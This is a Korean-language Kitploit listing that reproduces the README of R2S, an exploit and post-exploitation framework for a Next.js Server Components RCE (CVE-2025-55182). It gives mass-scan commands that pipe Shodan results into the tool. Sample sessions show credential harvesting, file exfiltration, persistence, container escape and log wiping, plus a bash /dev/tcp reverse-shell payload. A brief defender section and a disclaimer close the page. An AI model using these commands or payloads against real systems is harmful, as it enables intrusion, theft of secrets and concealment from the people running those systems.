Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
React2Shell — R2S는 Next.js React Server Components 취약점(CVE-2025-55182)을 대상으로 하는 포괄적인 악용 및 사후 악용 프레임워크입니다. 파일 전송, 지속성, 열거, 권한 상승 확인 등을 포함한 고급 기능을 갖춘 대화형 셸을 제공하여 침투 테스트를 지원합니다. | Kitploit
도구/GitHubGitHub/4nuxd/react2shell
Penetration Testing FrameworksPrivilege EscalationExploit FrameworksPersistence MechanismsLateral MovementWeb Application ExploitationData ExfiltrationPost-ExploitationCommand and ControlContainer Escape
GitHub
439개월 전아직 검토되지 않음
4nuxd/react2shell

React2Shell

R2S는 Next.js React Server Components 취약점(CVE-2025-55182)을 대상으로 하는 포괄적인 악용 및 사후 악용 프레임워크입니다. 파일 전송, 지속성, 열거, 권한 상승 확인 등을 포함한 고급 기능을 갖춘 대화형 셸을 제공하여 침투 테스트를 지원합니다.

저장소 보기

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

🚀 R2S - Next.js RSC 익스플로잇 프레임워크

Version Python License CVE

Next.js React Server Components RCE를 위한 고급 포스트-익스플로잇 프레임워크

기능 • 설치 • 사용법 • 명령어 • 예제


📋 개요

R2S는 Next.js React Server Components 취약점(CVE-2025-55182)을 대상으로 하는 종합 익스플로잇 및 포스트-익스플로잇 프레임워크입니다. 파일 전송, 지속성, 정보 수집, 권한 상승 점검 등을 포함한 고급 기능을 갖춘 대화형 셸을 제공하며 침투 테스트에 사용됩니다.

🎯 주요 기능

  • ✅ 자동 취약점 스캐닝 - 다중 대상 대량 스캔
  • ✅ 대화형 RCE 셸 - 디렉터리 이동이 가능한 상태 저장 명령 실행
  • ✅ HTTP 기반 파일 전송 - base64 제한 없이 파일 업로드/다운로드
  • ✅ 리버스 셸 자동화 - 25개 이상의 다양한 리버스 셸 페이로드 시도
  • ✅ 고급 정보 수집 - 시스템, 네트워크, 컨테이너, 클라우드 메타데이터
  • ✅ 권한 상승 - 자동화된 privesc 벡터 탐지
  • ✅ 자격 증명 수집 - 비밀번호, 키, 토큰, 시크릿 추출
  • ✅ 지속성 메커니즘 - 재부팅 후에도 접근 유지
  • ✅ 측면 이동 - 다른 호스트 탐색 및 피벗
  • ✅ 컨테이너 탈출 - Docker/Kubernetes 탈출 벡터 점검
  • ✅ 데이터 유출 - 민감한 파일 및 구성 추출
  • ✅ 은밀한 작업 - 로그 삭제 및 흔적 제거

  • 🔥 기능

    🌐 핵심 익스플로잇

    • 다중 스레드 지원 대량 스캐닝
    • 파이프라인 모드 - 다른 도구와의 통합
    • Next.js RSC 자동 취약점 탐지
    • 지속적인 작업 디렉터리를 가진 상태 저장 대화형 셸

    📁 파일 작업

    • HTTP 기반 업로드 - wget/curl을 통해 대상에 파일 전송
    • HTTP 기반 다운로드 - POST 요청을 통해 파일 유출
    • 크기 제한 없음 - base64 방식과 달리 대용량 파일도 처리
    • 자동 HTTP 서버 - 필요 시 시작/중지

    🔍 정찰 및 정보 수집

    • 시스템 정보 수집 - OS, 커널, 사용자, 프로세스
    • 네트워크 탐색 - 인터페이스, 라우트, ARP, DNS, 수신 포트
    • 컨테이너 탐지 - Docker, Kubernetes, LXC 식별
    • 클라우드 메타데이터 - AWS, GCP, Azure 자격 증명 추출
    • 프로세스 메모리 덤프 - 실행 중인 프로세스에서 시크릿 추출
    • 흥미로운 파일 발견 - SUID, 쓰기 가능 디렉터리, 백업, 설정 파일

    🔐 자격 증명 수집

    • 환경 변수 (비밀번호, API 키, 토큰)
    • .env 파일 및 설정 파일
    • SSH 개인 키 및 authorized_keys
    • 민감한 명령이 포함된 Bash 히스토리
    • 데이터베이스 파일 (SQLite, MySQL 덤프)
    • 클라우드 자격 증명 (AWS, Azure, GCP)
    • Git 자격 증명 및 NPM 토큰
    • 브라우저 데이터 (쿠키, 로그인 데이터)
    • Docker 및 Kubernetes 시크릿

    ⬆️ 권한 상승

    • SUID/SGID 바이너리 탐지
    • Sudo 권한 열거
    • 쓰기 가능한 시스템 파일 (/etc/passwd, /etc/shadow)
    • Docker 소켓 접근 점검
    • Linux capabilities 분석
    • 커널 익스플로잇 제안
    • Cron 작업 열거
    • PATH 하이재킹 기회

    🔄 포스트-익스플로잇

    • 지속성 메커니즘 - Cron 작업, .bashrc, systemd 서비스
    • 고급 지속성 - LD_PRELOAD, systemd 타이머
    • 포트 스캐닝 - 내부 네트워크 정찰
    • 측면 이동 - SSH 키 발견, known_hosts 분석
    • 컨테이너 탈출 - 특권 컨테이너 점검, capabilities 분석
    • 데이터 유출 - 자동화된 민감 데이터 수집
    • 리버스 셸 자동화 - 25개 이상의 페이로드 유형, 자동 재시도

    🥷 은밀성 및 회피

    • 로그 삭제 - Bash 히스토리, 인증 로그, syslog
    • 흔적 제거 - wtmp, lastlog 정리
    • 세션 관리 - 세션 저장 및 재개

    🛠️ 설치

    사전 요구 사항

    root@kitploit:~
    # Python 3.6 이상
    python3 --version
    
    # 의존성 설치
    pip3 install requests urllib3
    

    빠른 시작

    root@kitploit:~
    # 저장소 클론 또는 다운로드
    cd r2s-main
    
    # 실행 권한 부여 (선택 사항)
    chmod +x r2s_enhanced.py
    
    # 도구 실행
    python3 r2s_enhanced.py -h
    

    🚀 사용법

    기본 구문

    root@kitploit:~
    python3 r2s_enhanced.py [옵션]
    

    명령줄 옵션

    옵션설명기본값
    -u, --url단일 대상 URL-
    -l, --listURL 목록이 포함된 파일-
    -c, --cmd초기 실행 명령어id
    -t, --threads스캔 스레드 수30
    -p, --proxyHTTP 프록시 (예: http://127.0.0.1:8080)-
    -v, --verbose상세 출력 활성화False
    --http-port파일 전송용 HTTP 서버 포트8000

    입력 방법

    1. 단일 대상

    root@kitploit:~
    python3 r2s_enhanced.py -u http://target.com
    

    2. 다중 대상 (파일)

    root@kitploit:~
    python3 r2s_enhanced.py -l targets.txt -t 50
    

    3. 파이프라인 모드 (stdin)

    root@kitploit:~
    cat targets.txt | python3 r2s_enhanced.py
    shodan search "Next.js" | python3 r2s_enhanced.py
    subfinder -d example.com | httpx | python3 r2s_enhanced.py
    

    💻 대화형 셸 명령어

    RCE 접근 권한을 획득하면 다음 명령어를 사용할 수 있는 대화형 셸로 진입합니다.

    📂 파일 전송

    root@kitploit:~
    upload <local_file> <remote_path>    # 대상에 파일 업로드
    download <remote_file> <local_path>  # 대상에서 파일 다운로드
    

    🧭 탐색

    root@kitploit:~
    cd <directory>                       # 작업 디렉터리 변경
    pwd                                  # 작업 디렉터리 출력
    

    🔍 정보 수집

    root@kitploit:~
    enum                                 # 완전한 시스템 정보 수집
    privesc                              # 권한 상승 점검
    harvest                              # 자격 증명 수집
    portscan <ip>                        # 내부 네트워크 포트 스캔
    memdump [pid]                        # 프로세스 메모리 덤프로 시크릿 추출
    

    🎯 포스트-익스플로잇

    root@kitploit:~
    lateral                              # 측면 이동 기회
    escape                               # 컨테이너 탈출 벡터
    exfil [type]                         # 데이터 유출 (env/config/keys/db/logs/all)
    reverse <lhost> <lport>              # 여러 리버스 셸 페이로드 시도
    

    🔒 지속성

    root@kitploit:~
    persist                              # 기본 지속성 추가
    advpersist                           # 고급 지속성 추가
    

    🥷 은밀성

    root@kitploit:~
    stealth                              # 로그 삭제 및 흔적 제거
    

    💾 세션 관리

    root@kitploit:~
    save                                 # 현재 세션 저장
    help, ?                              # 도움말 표시
    exit, quit                           # 대화형 셸 종료
    

    🖥️ 시스템 명령어

    모든 셸 명령어를 직접 실행 가능:

    root@kitploit:~
    whoami
    id
    uname -a
    ps aux
    netstat -tulpn
    cat /etc/passwd
    

    📚 예제

    예제 1: 기본 익스플로잇

    root@kitploit:~
    $ python3 r2s_enhanced.py -u http://vulnerable-app.com
    
        _   __          __  ____            
       / | / /__  _  __/ /_/ __ \________   
      /  |/ / _ \| |/_/ __/ /_/ / ___/ _ \  
     / /|  /  __/>  </_ _/ _, _/ /__/  __/  
    /_/ |_/\___/_/|_|\__/_/ |_|\___/\___/   
    
       Next.js RSC Exploit Tool (CVE-2025-55182)
       Mass Scanner & Pipeline Edition (v4.1.0 - Enhanced)
    
       >> CREDIT( G4rxd )
    
    [*] Loaded 1 targets. Starting scan with 30 threads...
    [*] Payload Command: id
    
    [VULN] http://vulnerable-app.com >>> RCE SUCCESS
           Output: uid=1000(node) gid=1000(node) groups=1000(node)
    
    [+] Stateful Interactive RCE shell started. Type 'help' for commands.
    [*] Advanced features: enum, privesc, persist, portscan, harvest, stealth
    [*] New features: memdump, lateral, escape, exfil, advpersist, reverse
    
    [+] HTTP server started on 192.168.1.100:8000
    
    next-rce:/app$
    

    예제 2: 시스템 정보 수집

    root@kitploit:~
    next-rce:/app$ enum
    
    [*] Starting automated enumeration...
    
    ============================================================
    [*] System Info
    ============================================================
    Linux 5.15.0-91-generic #101-Ubuntu SMP x86_64 GNU/Linux
    NAME="Ubuntu"
    VERSION="22.04.3 LTS (Jammy Jellyfish)"
    
    ============================================================
    [*] Current User
    ============================================================
    node
    uid=1000(node) gid=1000(node) groups=1000(node),27(sudo)
    
    ============================================================
    [*] Container Detection
    ============================================================
    12:devices:/docker/a1b2c3d4e5f6
    11:cpuset:/docker/a1b2c3d4e5f6
    [Docker container detected]
    
    ...
    

    예제 3: 파일 전송

    root@kitploit:~
    # 파일 업로드
    next-rce:/app$ upload /tmp/exploit.sh /var/tmp/exploit.sh
    [*] Uploading /tmp/exploit.sh (2048 bytes) via HTTP...
    [+] Upload successful!
        -rwxr-xr-x 1 node node 2048 Dec 12 03:28 /var/tmp/exploit.sh
    
    # 파일 다운로드
    next-rce:/app$ download /etc/passwd ./passwd.txt
    [*] Downloading /etc/passwd via HTTP...
    [+] Download successful! (1523 bytes)
        Saved to: ./passwd.txt
    

    예제 4: 자격 증명 수집

    root@kitploit:~
    next-rce:/app$ harvest
    
    [*] Harvesting credentials...
    
    [*] Environment Variables:
    DATABASE_PASSWORD=super_secret_pass
    API_KEY=sk-1234567890abcdef
    AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
    
    [*] .env Files:
    /app/.env
    /app/.env.production
    /var/www/.env.local
    
    [*] SSH Keys:
    /home/node/.ssh/id_rsa
    /root/.ssh/id_rsa
    
    ...
    

    예제 5: 리버스 셸

    root@kitploit:~
    next-rce:/app$ reverse 192.168.1.100 4444
    
    [*] Starting reverse shell attempts to 192.168.1.100:4444
    [!] Make sure you have a listener running: nc -lvnp 4444
    
    [*] Trying 25 different reverse shell payloads...
    
    [1/25] Trying Bash TCP... ✓ Executed
    [?] Did you receive a connection? (y/n/s to stop): y
    
    [+] SUCCESS! Reverse shell established using: Bash TCP
    [*] Payload: bash -i >& /dev/tcp/192.168.1.100/4444 0>&1
    

    예제 6: 대량 스캐닝

    root@kitploit:~
    $ cat targets.txt
    http://app1.example.com
    http://app2.example.com
    http://app3.example.com
    
    $ python3 r2s_enhanced.py -l targets.txt -t 50
    
    [*] Loaded 3 targets. Starting scan with 50 threads...
    
    [VULN] http://app1.example.com >>> RCE SUCCESS
    [VULN] http://app3.example.com >>> RCE SUCCESS
    
    [*] Scan completed.
    

    예제 7: 권한 상승 점검

    root@kitploit:~
    next-rce:/app$ privesc
    
    [*] Checking privilege escalation vectors...
    
    [*] SUID Binaries:
    /usr/bin/sudo
    /usr/bin/passwd
    /usr/bin/mount
    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    
    [*] Sudo Permissions:
    User node may run the following commands:
        (ALL : ALL) NOPASSWD: /usr/bin/docker
    
    [*] Docker Socket:
    srw-rw---- 1 root docker 0 Dec 12 03:28 /var/run/docker.sock
    
    [*] Docker Group:
    In docker group - EXPLOITABLE!
    
    ...
    

    예제 8: 컨테이너 탈출

    root@kitploit:~
    next-rce:/app$ escape
    
    [*] Checking container escape vectors...
    
    [*] Container Type:
    12:devices:/docker/a1b2c3d4e5f6
    
    [*] Privileged Container:
    PRIVILEGED
    
    [*] Docker Socket:
    srw-rw---- 1 root docker 0 Dec 12 03:28 /var/run/docker.sock
    
    [*] Capabilities:
    CapPrm: 0000003fffffffff
    CapEff: 0000003fffffffff
    [Full capabilities - container is privileged]
    
    ...
    

    🔧 고급 기능

    리버스 셸 페이로드

    이 도구는 여러 언어와 기술에 걸쳐 25개 이상의 리버스 셸 페이로드를 포함합니다.

    • Bash (TCP, UDP, exec 변종)
    • Netcat (전통적, mkfifo, OpenBSD)
    • Python/Python3 (socket, pty)
    • Perl (여러 변종)
    • PHP (exec, system, passthru)
    • Ruby (socket 변종)
    • Node.js (child_process, socket)
    • Socat, Telnet, AWK
    • Golang, OpenSSL

    클라우드 메타데이터 추출

    다음에서 자격 증명을 자동 감지 및 추출합니다.

    • AWS - IAM 역할, 보안 자격 증명
    • GCP - 서비스 계정 토큰
    • Azure - 인스턴스 메타데이터
    • 클라우드 자격 증명이 포함된 환경 변수

    컨테이너 탐지

    다음을 식별하고 분석합니다.

    • Docker 컨테이너
    • Kubernetes 파드
    • LXC 컨테이너
    • 특권 vs 비특권
    • 사용 가능한 탈출 벡터

    ⚠️ 법적 고지

    교육 및 승인된 테스트용으로만 사용하세요

    이 도구는 교육 목적 및 승인된 침투 테스트용으로 제공됩니다. 사전 상호 동의 없이 대상을 공격하는 데 이 도구를 사용하는 것은 불법입니다. 저자는 이 도구의 오용이나 손해에 대해 책임을 지지 않습니다.

    법적 사용 요구 사항:

    • ✅ 대상 소유자의 서면 승인
    • ✅ 정의된 범위 및 참여 규칙
    • ✅ 전문 침투 테스트 참여
    • ❌ 시스템에 대한 무단 접근
    • ❌ 악의적인 의도 또는 손상

    🛡️ 탐지 및 방어

    방어자용

    탐지:

    • 비정상적인 Next-Action 헤더 모니터링
    • 존재하지 않는 엔드포인트로의 multipart/form-data POST 요청 확인
    • 오류 응답에서 base64로 인코딩된 명령 출력 확인
    • Next.js 로그에서 child_process.execSync 모니터링

    완화 조치:

    • Next.js를 최신 패치 버전으로 업데이트
    • 웹 애플리케이션 방화벽(WAF) 규칙 구현
    • 서버 측 코드 실행 제한
    • 모든 RSC 요청 모니터링 및 로깅
    • 적절한 입력 검증 구현

    📊 버전 기록

    v4.1.0 (현재) - 강화판

    • ✅ 리버스 셸 자동화 추가 (25+ 페이로드)
    • ✅ 메모리 덤프 기능 추가
    • ✅ 측면 이동 탐색 추가
    • ✅ 컨테이너 탈출 점검 추가
    • ✅ 데이터 유출 자동화 추가
    • ✅ 고급 지속성 메커니즘 추가
    • ✅ HTTP 파일 전송 개선
    • ✅ 정보 수집 기능 강화
    • ✅ 오류 처리 및 UX 개선

    v4.0.0 - 포스트-익스플로잇 프레임워크

    • ✅ HTTP 기반 파일 전송
    • ✅ 지속성 메커니즘
    • ✅ 포트 스캐너
    • ✅ 권한 상승 점검
    • ✅ 네트워크 정보 수집
    • ✅ 자격 증명 수집
    • ✅ 세션 관리
    • ✅ 자동 정보 수집
    • ✅ 은밀성 기능

    v3.0.0 - 대화형 셸

    • 디렉터리 이동이 가능한 상태 저장 셸
    • 기본 파일 전송 (base64)
    • 오류 처리 개선

    🤝 기여

    기여를 환영합니다! 모든 기여는 교육 및 방어 보안 목적에 부합해야 합니다.


    👨‍💻 저자

    G4rxd


    🙏 크레딧

    • CVE-2025-55182 발견 팀
    • Next.js 보안 연구 커뮤니티
    • 오픈 소스 보안 도구 커뮤니티

    📄 라이선스

    이 프로젝트는 교육 및 승인된 테스트 목적으로만 라이선스가 부여됩니다.


    ⚡ 즐거운 윤리적 해킹 되세요! ⚡

    기억하세요: 큰 힘에는 큰 책임이 따릅니다.

    도구 다운로드